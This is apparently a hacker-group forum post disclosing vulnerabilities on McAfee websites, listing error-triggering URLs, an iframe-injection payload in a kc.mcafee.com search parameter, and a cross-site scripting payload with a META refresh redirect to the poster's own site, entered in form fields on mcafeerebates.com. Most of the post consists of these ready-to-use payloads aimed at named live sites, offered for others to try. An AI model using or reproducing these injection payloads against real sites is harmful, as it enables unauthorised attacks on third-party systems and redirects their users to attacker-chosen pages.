Nemesis Our Projects Forums Extra Controls
  RegMe



Multiple Bugs on McAfee Websites



http://www.mcafee.com/us/images/pos/pos_aboutus.jpg

I think it's not so easy :)

Server XMLHTTP post request errors

Code:
http://www.mcafee.com/us/about/antipiracy_'


Code:
http://www.mcafee.com/us/enterprise/solutions/network_access_'


Code:
http://www.mcafee.com/us/security_'


Quote:
msxml3.dll error '80004005'

A string literal was not closed. redirect[@org='www.mcafee.com/us/enterprise/solutions/network_access_'-->']<--

/error-pages/cls_redirect_lib.asp, line 67


http://img230.imageshack.us/img230/6020/72727083.jpg


Iframe Injection

Code:
https://kc.mcafee.com


Code:
https://kc.mcafee.com/corporate/index?page=answers&type=search&searchid=1240943327683&question_box="<iframe src=index.htm


http://img509.imageshack.us/img509/7641/92678129.jpg

http://img2.imageshack.us/img2/2374/82240550.jpg


XSS and Iframe Injection

Code:
http://www.mcafeerebates.com



http://img17.imageshack.us/img17/34/29025695.jpg

http://img17.imageshack.us/img17/4913/20094952.jpg

On the same website - http://www.mcafeerebates.com/promocenter/mcafee/promo_search.html - redirect also works fine

Example: -  try to put something like this:
Code:
"<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">
  in Date Purchased  or Rebate Offer Number/Promotion Code:  and then click Continue.

You will be redirected to our website :)


Submitted by [-TE-]-Methodman


No Comments


You need to be logged in to be able to post comments